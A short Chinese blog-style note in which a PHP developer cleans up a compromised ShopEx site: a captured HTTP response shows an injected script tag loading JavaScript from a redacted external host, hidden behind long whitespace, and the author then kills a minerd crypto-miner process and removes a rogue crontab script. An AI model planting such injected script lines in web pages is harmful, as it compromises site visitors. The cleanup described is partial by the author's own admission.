站点访问异常弹窗

站点访问异常弹窗

抓包工具

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: PHPSESSID=b91599f27f5b255a382d155219d72dba; expires=Fri, 30-Jun-2017 09:08:27 GMT; path=/
Set-Cookie: SHOPEX_SID=f104bfff464df59de8575b1eaac5c7c2
Content-Length: 586


<script src=http://***.top/***.js language=javascript></script>                                                                                                                                                                                                                                                                  <script>
        var href = parent.location.href;
        var pos = href.indexOf('#') + 1;
        window.location.href="http://www.***.com.cn/shopadmin/index.php?ctl=passport&act=login"+(pos ? ('&return='+encodeURIComponent(href.substr(pos))) : '');
</script>

在网站系统代码中查看 均没有找到注入地方

后来服务器上top进程  发现了异常

处理 1、杀死进程  2、删除木马文件  (后面其它安全措施暂无 我只是搞php的 运维方便不够精通 )

kill -9 18904

rm -rf /tmp/minerd

再次查看 已经正常了

另crontab里还有个异常的Python脚本  也去掉

可以再装个Linux的杀毒软件